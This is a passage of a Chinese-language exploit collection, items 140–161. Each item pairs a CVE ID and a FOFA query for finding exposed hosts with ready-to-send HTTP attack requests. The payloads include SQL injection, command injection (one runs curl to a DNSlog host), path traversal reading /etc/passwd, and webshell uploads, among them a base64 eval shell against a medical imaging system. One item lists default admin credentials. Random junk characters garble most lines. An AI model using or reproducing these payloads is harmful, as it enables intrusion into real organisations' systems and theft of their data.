2 m$ E0 ~" B0 C4 m1 g$ b& YAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
2 s* i9 x' |8 Z! ?9 \8 V- u# HAccept-Encoding: gzip, deflate, br( o! s6 s, e6 F2 w; J. @0 _
Connection: close
5 e9 W+ o- G8 T1 pCookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
% `8 w( n8 h: I# X2 h7 bUpgrade-Insecure-Requests: 1 @0 v ?! v' N2 L
. z! P3 V6 o" W( c$ o
3 @+ R5 s, k, f" f* a7 o- e140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入
! M8 C5 o+ e* C/ WCVE-2024-2566
; g; u$ C: l$ p! d* `( E5 dFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
/ t4 y; s$ `) X% y% h1 HGET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva×tamp=1&sign=1 HTTP/1.1( j$ ~: L1 o5 N- U5 t) k
Host: x.x.x.x
% c3 |$ _, G8 ]0 DUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
- ~ S- }& m# Z7 Z$ zAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
- W, a1 A* ] k" sAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
# q" ]5 t0 _; y" \Accept-Encoding: gzip, deflate, br
6 c: D5 ` O4 P6 DConnection: close
2 k4 e9 T6 t+ R8 C5 h) wCookie: authcode=h8g9/ G/ i* A! F% \7 v4 @- q; i7 f
Upgrade-Insecure-Requests: 1) `* @1 z' I/ G* m P2 g' W w' I0 R2 ]
4 z' Q' h/ N( ~3 g/ f1 g/ L" U. k
6 k$ f7 i, M! T! M6 `3 ?& x( h4 R141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入1 k" W# ^# y3 s, n% z" h6 S
FOFA:body="指挥调度管理平台"' h$ S/ r* e2 A
POST /app/ext/ajax_users.php HTTP/1.1
; K+ ~* m7 B7 x* e7 g* pHost: your-ip$ V3 t! B1 L( t: A+ E# b
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info; T% Z, R& a4 L3 @
Content-Type: application/x-www-form-urlencoded
: J( {/ {) S5 B0 w) x! B
& V: i5 d/ V4 Y( t( o. o
. D, w6 h- s5 Vdep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -& b! Z" K" c" v
2 r- f) B; [4 Q
7 {" x3 m' u- H- F4 l5 a142. CMSV6车辆监控平台系统中存在弱密码$ U% U5 U: @& i; f9 |4 v& n
CVE-2024-29666
8 a* c* `1 A0 X0 [+ p$ BFOFA:body="/808gps/"
* w$ W/ g$ g/ U" M9 Kadmin/admin0 w; p, K7 L$ p3 H$ f6 d' I
143. Netis WF2780 v2.1.40144 远程命令执行5 ^7 h( B# q, k! J/ m
CVE-2024-25850* P: o$ w" M4 A" e4 e3 T
FOFA:title='AP setup' && header='netis'/ D) P: H8 `: i$ n# i& X& M. c$ t4 ~" u
PAYLOAD# \& t! Y: P) \
' l( W& e9 d& S8 M6 U8 s
144. D-Link nas_sharing.cgi 命令注入
( q; o6 Q0 ~5 U! ~, G1 j" jFOFA:app="D_Link-DNS-ShareCenter"
1 s1 T; D. s$ G: }system参数用于传要执行的命令$ K0 G/ v' m% H7 ]; H
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
% W; Z" _: X6 u& GHost: x.x.x.x( \' P( c* u' \0 o0 ^
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0% X. i/ w" g1 Z; ^+ j# a% X* H
Connection: close, i: X4 k2 R L/ y2 m: n* R
Accept: */*
' a5 s2 \3 H& {8 r$ C1 dAccept-Language: en
& m; t) p2 k6 S: KAccept-Encoding: gzip
; C9 x5 l! ?5 O% [5 j
! ~7 W# r2 @7 P0 Z& U/ R% ^+ u6 \
; y O- i) v6 X% R0 l5 c9 J145. Palo Alto Networks PAN-OS GlobalProtect 命令注入" j. q) u6 W( _' \! r
CVE-2024-34005 i: P1 u$ R& ^1 j
FOFA:icon_hash="-631559155"% n* s" l2 W- j. T5 v1 X$ z. a6 K
GET /global-protect/login.esp HTTP/1.1% T2 Z: @* M. r' ?; y' P% F& |- t
Host: 192.168.30.112:1005
& C$ y9 n/ I6 S( s/ nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
0 {: Q- g; R5 P' S/ F0 yConnection: close
7 o2 v" p& x$ g' ^Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;
* f! W& E; A! ]! p2 y1 {Accept-Encoding: gzip
5 n0 q. U" @1 d7 v0 s2 t% C
! L1 z/ P. Q! X& ?) R- s
- Z' ?. U- A( `2 x6 O% Z146. MajorDoMo thumb.php 未授权远程代码执行
, F- }& w" S/ z8 P0 \: ~# t2 G( }! YCNVD-2024-02175
' Z: }! g4 Z1 @9 I, j# x. nFOFA:app="MajordomoSL"8 K0 A" q( j. |; p6 K0 ]6 j
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
6 _/ M- j! U5 E3 T1 m1 x2 H5 @7 {0 kHost: x.x.x.x, e( A2 U/ {; n9 S7 \0 g; q( Z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
' J/ Y# O% l3 @: _$ AAccept-Charset: utf-8
0 l6 ^9 p5 e% ?6 f4 D8 H. l* kAccept-Encoding: gzip, deflate
/ j* Q# E6 r% ]3 u. |' Z& P" G2 gConnection: close+ s6 l: S+ |0 g% B9 w4 C
! e8 q6 U9 j, c1 h& ~
& X' D6 b5 X2 F; h147. RaidenMAILD邮件服务器v.4.9.4-路径遍历
8 {" P4 z! s2 Q% t _% o b; OCVE-2024-32399
9 |9 Z6 g0 O7 U4 Z% M4 S) w1 f9 lFOFA:body="RaidenMAILD"2 ^- z0 p! K0 ]* g
GET /webeditor/../../../windows/win.ini HTTP/1.1
6 B& L% K+ M5 r/ @* }, P1 f: y* QHost: 127.0.0.1:81) K0 E" j! Y, O4 z; S; G9 s Z
Cache-Control: max-age=0+ A2 n1 [5 e4 t1 S1 H: ?' B
Connection: close+ e( R8 z0 x% I0 {9 e R' T" p
; R+ V$ q/ S3 A% p2 z
$ B5 F2 g% n( {# t2 |) [148. CrushFTP 认证绕过模板注入
( |, V" z2 t; Z/ t+ j& T9 b% s" \CVE-2024-4040
: I3 i4 g% o# F' l, ~, L0 s/ x \8 @FOFA:body="CrushFTP"( r, r3 p- M' }7 Q6 Y& o$ t5 U' J
PAYLOAD
2 M. b; W4 `8 W. ] r
' ?) u% o. ?) f9 @6 ?. f149. AJ-Report开源数据大屏存在远程命令执行
$ ]( e" {5 t4 ~: P/ }FOFA:title="AJ-Report"
% }1 G% G( i3 T7 |4 z; |6 V9 a8 Y5 q! S' z* e- h4 I8 K/ Q9 d
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1+ Z7 h4 S6 [/ J! b& {! K" |: N& M! r
Host: x.x.x.x% a& j8 Q, [" H0 n& ~5 d$ X0 t/ ^
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36( A0 H# M; j, m. H# J, a
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.76 k, ^. V% _5 M) u, L u
Accept-Encoding: gzip, deflate, br; C$ w7 b7 Z; k# e ^
Accept-Language: zh-CN,zh;q=0.9- o" I( K" L, B& J7 M! Y1 J* u8 X0 E
Content-Type: application/json;charset=UTF-8, B( k3 e% B4 M) d
Connection: close2 `1 O9 [: e0 r1 E. r
" o$ T7 a' I G; }6 L/ K/ Z: }{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}
$ f& {/ ~8 J3 g8 j( s1 ^) v, [
! p* [2 P5 b! J: _; Y150. AJ-Report 1.4.0 认证绕过与远程代码执行
, U& W1 E, { w. wFOFA:title="AJ-Report"
1 k8 D' {7 t. bPOST /dataSetParam/verification;swagger-ui/ HTTP/1.1
2 [7 \% @0 ?, [' E2 WHost: x.x.x.x
1 C; E/ m* W9 a8 P& y; ~% d$ vUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36% M4 I) E+ S# M
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.72 h( b7 @* j, Q! X( h$ e
Accept-Encoding: gzip, deflate, br y8 y: @% V7 M/ O# B( H( h
Accept-Language: zh-CN,zh;q=0.92 q7 J8 M% a- n2 u1 E$ `
Content-Type: application/json;charset=UTF-8
3 d$ `& q. N0 V& W/ q1 s1 iConnection: close7 e, M6 e. ?) N+ a8 U4 q" f4 u% {
Content-Length: 339) c) V! m/ J R1 |8 J& z0 A
5 X: N1 k5 l: L( o6 s{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}
6 ]/ o7 _$ E$ o$ e# e6 W9 X. W4 h( U) u9 a: ]) K5 G+ n; a* d
0 }) x$ N( u5 Y
151. AJ-Report 1.4.1 pageList sql注入5 t0 P) P5 I) |8 |1 Z' X
FOFA:title="AJ-Report"
( j4 ^% y' B. V9 N# b% kGET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
+ C% j. {0 E1 M7 c, mHost: x.x.x.x
& w( r: w- t9 `3 v, _4 dUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15/ d& [9 }+ q5 q2 [
Connection: close
( N/ J V! l+ {& d5 m, E, B+ nAccept-Encoding: gzip
`& S& ^+ B1 Z2 R0 S
- T$ L9 A T, x" C! Y% @' {$ V. w0 v7 C! a+ ?5 k0 M
152. Progress Kemp LoadMaster 远程命令执行1 D% x, V, R9 h& D
CVE-2024-1212
2 R: I6 T& i, c6 P& N8 uLoadMaster <= 7.2.59.2 (GA)
. y" m& U$ u* d0 _4 P5 YLoadMaster<=7.2.54.8 (LTSF)
$ \; u* I/ V3 D# PLoadMaster <= 7.2.48.10 (LTS)
}/ C, o; n- A& M% z3 k' |7 X tFOFA:body="LoadMaster"
Y! c G: F5 ?5 X; dJztsczsnOmRvZXNub3RtYXR0ZXI=是';ls;':doesnotmatter的base64编码
0 j7 }2 C, j: |8 s. r$ r& BGET /access/set?param=enableapi&value=1 HTTP/1.16 @, \4 S$ D U7 [
Host: x.x.x.x
1 Y; E: J* [( iUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.19 {$ T: l( ~3 g) J& m+ V7 Q/ k
Connection: close
3 x0 _" E( {* e7 u% d3 {Accept: */*8 |: I9 D5 ^4 P: w8 X o
Accept-Language: en
\: g* \8 G! z, w4 ~+ w$ [Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=1 e* L/ {3 S0 c- Z
Accept-Encoding: gzip$ h6 p9 c0 D R$ i
3 ]' C4 R$ D) L6 ?+ Q
% x! X, Z: n+ m1 r: e8 V$ G" I153. gradio任意文件读取
0 t8 R. W* v8 |3 ^' O: h& rCVE-2024-1561FOFA:body="__gradio_mode__"
( {2 l# b& q; J) P第一步,请求/config文件获取componets的id
9 G, H2 [; }/ l' A; K+ u: \/ ^; Rhttp://x.x.x.x/config
/ r8 S+ e' {! m. H) s- R; p
: R' a3 x8 ]8 \1 b
; ]7 r k# N7 m3 v第二步,将/etc/passwd的内容写入到一个临时文件/ u3 _& |" w% @+ a8 r
POST /component_server HTTP/1.1# r0 s8 {- c* ^( E1 t i" g8 u
Host: x.x.x.x
: f4 J; v- ?: t4 O" P: K- `' ?User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.34 F6 E% B c" ^9 m0 S/ ?1 y: z
Connection: close+ j' a3 n* [+ o$ O/ V; m. y5 Q
Content-Length: 115! e8 _$ ^( m! Y( P% T7 x
Content-Type: application/json
- p( S7 L" X' _3 \. HAccept-Encoding: gzip7 p( l t z. ~: A3 x7 @: P
# W% h$ S7 H2 p6 B6 g7 c: N& U{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}& N6 A3 }) B4 v- ~- Z
# s0 N( q ]0 ?# n0 w( F+ n. r2 m0 Q: f
% v0 @& q g; g第三步访问9 p+ G0 E9 `" B1 D% d$ f0 Z$ T
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd6 l* F8 f' g4 g# ?/ a* g1 S) N; w
. f# c- l9 c% k, a7 j( c; Y+ ^
/ Q* K+ H6 g: W4 d2 x- D
154. 天维尔消防救援作战调度平台 SQL注入
0 ]9 D; D5 W2 [ N" wCVE-2024-3720FOFA:body="天维尔信息科技股份有限公司" && title=="登入"( F- R5 n8 G' @8 [
POST /twms-service-mfs/mfsNotice/page HTTP/1.1
}7 p' v, }. c1 n+ U: I7 i8 ~Host: x.x.x.x
1 D7 m* v! c7 |# y, p0 q X, ZContent-Length: 106# P& q5 `% c# s2 F; o: `; }4 |6 v
Cache-Control: max-age=0* G+ w) _4 y" P4 `, m- @
Upgrade-Insecure-Requests: 1* h1 \' w4 g+ P! y9 K$ n1 Y) g+ i4 G
Origin: http://x.x.x.x
$ ^2 \* F5 R, B; JContent-Type: application/json( q& ~) V" M& u. d0 e. A: j6 C4 N3 ~' v
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
S$ u$ b+ h, Z: ^; tAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7; l3 q' I% R, d% D* K
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page9 S Z* \/ n6 ] p2 B2 Q
Accept-Encoding: gzip, deflate4 D/ N" i) M' N% Q
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
+ X; O7 ]3 a* H% `& I* IConnection: close' k M; g" U8 q' j
7 ?. |/ d5 ^& v+ o2 m- b, u
{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}
& ^1 z4 |' k/ \ v4 V
& q! _' y5 H2 G/ d* y+ X& X0 |3 l; S, n' q
155. 六零导航页 file.php 任意文件上传9 x( f9 M! C7 Y: r# `
CVE-2024-34982/ M7 g# @6 _8 e; A
FOFA:title=="上网导航 - LyLme Spage"
( h8 ?8 ~3 H7 w/ ePOST /include/file.php HTTP/1.1
" q6 Y- ?" E: b: ?: \! t6 g5 SHost: x.x.x.x
! ^" ~% c7 P7 y! BUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.00 t$ a7 V, ]+ A. P8 E2 Q
Connection: close
) M6 v7 d* `2 `5 K6 T+ r, V& gContent-Length: 232
0 ~8 r6 B( p+ R6 p& O4 WAccept: application/json, text/javascript, */*; q=0.01* X. K' m6 }$ a! s* o/ s) w( J
Accept-Encoding: gzip, deflate, br
9 T' S' ^3 t/ K" yAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.29 \' `7 F$ j1 F6 J* D
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f4 N- K/ O1 Q6 p9 P
X-Requested-With: XMLHttpRequest3 P* H: C2 d4 ?. w( j2 S
: ]( i( A0 c0 h& `" a% y( W-----------------------------qttl7vemrsold314zg0f6 j& n6 f5 Y3 r9 Q8 l! r q
Content-Disposition: form-data; name="file"; filename="test.php") I1 t6 S0 z7 Q4 \! p
Content-Type: image/png
S0 x" R$ {" Z b: n5 M6 Z; a1 g8 a6 y9 Z
<?php phpinfo();unlink(__FILE__);?>
8 M4 |: e3 f6 d( t-----------------------------qttl7vemrsold314zg0f--7 y: r5 M- ]0 S3 `7 R( K
' a7 i6 I, t3 F: y! i: I: V& k
`! Q$ N4 j; S4 g
访问回显文件http://x.x.x.x/files/upload/img_664ab7fd14d2c.php) w3 U; @* v i3 X+ ]3 j& Z( F( [
" f3 L1 S% Q2 {" A: {: H156. TBK DVR-4104/DVR-4216 操作系统命令注入
+ N# n3 t5 w; M8 S) ^/ @CVE-2024-3721
9 s G) u2 a, {9 ~' [) @# j3 F$ D/ ~FOFA:"Location: /login.rsp"
4 ^# P, Y! [ L/ y$ R3 V! F·TBK DVR-4104
6 X5 p3 N9 M+ [·TBK DVR-4216 B% \3 E& u" Z& q* P% f
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"
/ X9 \# Y- `, s2 @' R5 j: l
; i& e. T. S3 g/ I( \0 n1 s6 |- [
; W- g3 y% P# X: MPOST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
. O t/ }' y% z8 J" k4 JHost: x.x.x.x* e( y$ F |5 d: K$ z8 b& K
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15- k8 f" j% w/ M) Q. y1 f
Connection: close
0 m3 K1 s8 X* [. FContent-Length: 01 b) q9 X# r, X. a& ?; j
Cookie: uid=1 F* T/ N# j% |0 D$ c8 E
Accept-Encoding: gzip
5 g* O& G, g" u0 ?2 Y2 e# [4 T6 `
1 ~, x. ^5 A& E0 H157. 美特CRM upload.jsp 任意文件上传9 g( c9 {/ ]5 [+ ~
CNVD-2023-06971; b" _1 t' M" ?7 ?$ ?; Q. s# V$ C
FOFA:body="/common/scripts/basic.js"
2 N9 e; P6 W- V! GPOST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1: h* T& ?1 b+ U9 X! S7 d" w0 ~
Host: x.x.x.x
, M3 C# }' U1 YUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
5 N8 O/ a1 U' o4 MContent-Length: 709; }- q! A$ ]) [' l) {
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.71 D/ [6 \- K0 _0 d. Q
Accept-Encoding: gzip, deflate
5 K6 j4 @7 S$ M* n. s! x7 n8 QAccept-Language: zh-CN,zh;q=0.9. M1 K @+ _0 l& U7 A' \
Cache-Control: max-age=0; ]. u' P% C. H7 o. Y
Connection: close8 @0 R) q6 [0 M1 h s' B' y# ^
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
% e+ x9 y1 l: d$ Y' d# \Upgrade-Insecure-Requests: 1
( c& S8 y' L+ c5 [+ L9 a$ J7 h0 o' {
' i6 d N+ g6 S% o4 D" G" `# h# O------WebKitFormBoundary1imovELzPsfzp5dN* j- w4 f) g6 c; P
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp") V4 o& X" N9 l" M0 R% F, p
Content-Type: application/octet-stream* H" T, _( _2 e a3 X: J) \
/ V) I+ \1 B) k9 s: ]; Z! Gnyhelxrutzwhrsvsrafb1 \, s0 l4 u7 ^
------WebKitFormBoundary1imovELzPsfzp5dN
' _. N# v0 B9 [$ U8 aContent-Disposition: form-data; name="key"
7 A7 b4 W8 r+ g" D* z! `: M- D4 r8 W1 p$ ?" m! k
null: A. j3 H$ n" d. X( {4 s- _$ k
------WebKitFormBoundary1imovELzPsfzp5dN
3 s' R* r/ o5 Y8 y3 JContent-Disposition: form-data; name="form". j4 [$ n7 d: g# T
1 n0 B" t+ b- Xnull
3 F! g& t3 P* k, b& F, B6 ^- W------WebKitFormBoundary1imovELzPsfzp5dN4 I$ ]8 p% r, o* `8 c
Content-Disposition: form-data; name="field"- @7 q# E7 r) A: p
5 Q2 J- r @+ \ \* onull
4 B, W7 M7 q; o! s5 y1 e# U$ l$ w------WebKitFormBoundary1imovELzPsfzp5dN
$ A7 Q2 z6 b9 r. l9 r; QContent-Disposition: form-data; name="filetitile"$ I) y& m. ^" ] b% A5 J
- P0 d! p6 b- N3 r! Y; @$ {& wnull2 h( O* l( A7 K# J
------WebKitFormBoundary1imovELzPsfzp5dN
9 r. J: v; o E/ X. }( ]Content-Disposition: form-data; name="filefolder"
; J" Z/ N7 {3 u& K" t3 q
1 z& n4 \" e3 w; _: _9 @7 Rnull
1 K5 w% P; o+ x! d" o" a% a' S------WebKitFormBoundary1imovELzPsfzp5dN--2 a+ F/ V, U8 m# |9 I# X, q/ X
7 D% b( f- K( u& X& k+ k7 E" k) H, a$ I
http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp
5 E# R/ ?3 U+ Y# A. K$ U# t- q" _9 N# a# {+ s; c& o
158. Mura-CMS-processAsyncObject存在SQL注入; i6 p: `, n' `( z0 r+ v0 y0 q
CVE-2024-32640
( R: Q ^6 g; D. }FOFA:"Generator: Masa CMS"
( Q" R" y- Q1 u1 KPOST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.17 R0 {( d2 i) \: M" \
Host: {{Hostname}}
' h. ^( t! R' K' ^2 t0 ~" L$ V* X8 ]Content-Type: application/x-www-form-urlencoded
$ z+ [' P# H3 u6 x; h5 b+ F( N! ]
6 X: l5 W$ s" s' L# C% g' uobject=displayregion&contenthistid=x\'&previewid=18 y3 Y; N( H/ F- k
! I4 M% y. @" h' q
" r3 E5 u& w" H3 S5 F
159. 英飞达医学影像存档与通信系统 WebJobUpload任意文件上传0 x( e3 j: I( h& P
FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")- h, F- }) o) M9 I6 T. |$ r" p. g
POST /webservices/WebJobUpload.asmx HTTP/1.1% G% r- A; X/ O0 k2 b- E; }6 x
Host: x.x.x.x+ z: W, H, |% u0 M* r' S
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
5 a7 N8 t! o) r! o9 _Content-Length: 10802 K3 [* B; L( W. y
Accept-Encoding: gzip, deflate# i6 ~! e) | a: B
Connection: close$ n) {; l0 q1 T. a9 ?
Content-Type: text/xml; charset=utf-8
+ _2 P( n; T& D$ b0 ]9 @Soapaction: "http://rainier/jobUpload"
2 O4 X, p1 n1 b5 T9 Y- L3 P& T2 d# G, l+ j9 H/ `" j
<?xml version="1.0" encoding="utf-8"?>
b8 b/ p" m6 q/ H1 C' {6 B<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">" @1 ]$ x! H/ D3 ]/ F$ R
<soap:Body>
+ R0 J( x$ K$ v" _5 y. i<jobUpload xmlns="http://rainier">( y g: K) c6 u) T; |
<vcode>1</vcode>2 m0 _' b" u# E+ ]: H& T) \2 l
<subFolder></subFolder>
/ f1 ^- ~4 `3 A<fileName>abcrce.asmx</fileName>
, i4 t! T/ `' d<bufValue>PCVAIFdlYlNlcnZpY2UgTGFuZ3VhZ2U9IkpTY3JpcHQiIENsYXNzPSJXZWJTZXJ2aWNlMSIgJT4KIAppbXBvcnQgU3lzdGVtO2ltcG9ydCBTeXN0ZW0uV2ViO2ltcG9ydCBTeXN0ZW0uSU87aW1wb3J0IFN5c3RlbS5XZWIuU2VydmljZXM7CmltcG9ydCBTeXN0ZW0uV2ViLlNjcmlwdC5TZXJ2aWNlczsKaW1wb3J0IFN5c3RlbS5XZWI7CmltcG9ydCBTeXN0ZW0uV2ViLlNlcnZpY2VzOwogCnB1YmxpYyBjbGFzcyBXZWJTZXJ2aWNlMSBlleHRlbmRzIFdlYlNlcnZpY2UKewogCldlYk1ldGhvZEF0dHJpYnV0ZSBTY3JpcHRNZXRob2RBdHRyaWJ1dGUgZnVuY3Rpb24gQ21kc2hlbGwoUGFzcyA6IFN0cmluZykgOiBWb2lkCiAgICB7CiAgICAgICAgICAgIHZhciBjIID0gSHR0cENvbnRleHQuQ3VycmVudDsKICAgICAgICAgICAgdmFyIFJlcXVlc3QgPSBjLlJlcXVlc3Q7CiAgICAgICAgICAgIHZhciBSZXNwb25zZSA9IGMuUmVzcG9uc2U7CiAgICAgICAgICAgIGV2YWwoUGFzcyk7CiAgICCB9Cn0=</bufValue>
5 H% ]* k, x; P( L8 h! i</jobUpload>
) B& x* \( x1 [0 d$ W0 k</soap:Body>* h/ N6 J8 I8 [- Z
</soap:Envelope>
2 {: n6 z) r0 }( J' Q3 D1 W2 U }" P% m% ~ Z" |& m! S
" A, L2 d: w( K/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")
: `4 w/ j+ I2 F4 f. P+ Q9 z3 U! K) K; k! e, [1 f+ H
1 s& d @' ]0 w7 n
160. Sonatype Nexus Repository 3目录遍历与文件读取, S, U( t: p5 v: T; U
CVE-2024-4956
* G0 B5 F# V: oFOFA:title="Nexus Repository Manager"
4 m( o5 j; f. c# P' vGET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
4 @% L4 o% E. y5 oHost: x.x.x.x
! o: ?7 r# P* z, X+ ^User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
% y3 X' i$ s$ j: A1 U ]Connection: close, V# g) b1 |) \* W6 b! J
Accept: */*4 ?& ?/ k6 k- b. ?7 O
Accept-Language: en
1 I- j" L6 L7 j- Y* zAccept-Encoding: gzip
~+ X8 {! G0 K
) z B% N) {2 D" q# o
/ z D: y+ t$ G2 H2 |161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传
, x& j. e( p- }" aFOFA:body="/KT_Css/qd_defaul.css"% I0 e3 x( q" F! e$ |0 h
第一步,上传文件<fileName>字段指定文件名,<fileFlow>字段指定文件内容,内容需要base64加密
) p5 M: Q4 @. i) IPOST /Webservice.asmx HTTP/1.13 f: E1 {. ?2 O0 N% s% ^
Host: x.x.x.x
- L1 I6 L3 B, D4 zUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
& ^& [5 f* q) KConnection: close+ b" `) Y* ]0 O; \1 s+ e
Content-Length: 445- @; y) Z7 P3 Y' ?# F! u7 j
Content-Type: text/xml; V* S) X$ s: B2 d, }6 O
Accept-Encoding: gzip
. ^( L& {3 B: M# K) J2 r4 P! @& V. C
<?xml version="1.0" encoding="utf-8"?>3 e6 n4 H0 s0 u. _+ x% f: G
<soap:Envelope xmlns:xsi=") D6 V u3 N3 C5 l8 d' V
http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"# {% z: n; G: M! G
xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">5 J. o$ ?* ~& J7 ]1 n
<soap:Body>; Q5 e1 Y3 ~* O1 t) ]* J
<UploadResume xmlns="http://tempuri.org/">( p8 r) M0 f1 z9 ^* Q: I# g
<ip>1</ip>% D: s c3 o9 x
<fileName>../../../../dizxdell.aspx</fileName>* p% Z0 v! V9 G! K0 s1 e3 g$ x: f
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
1 k; T3 v) a7 g e1 v<tag>3</tag>
$ N! I7 Z3 L% A& D8 @: L6 E</UploadResume>
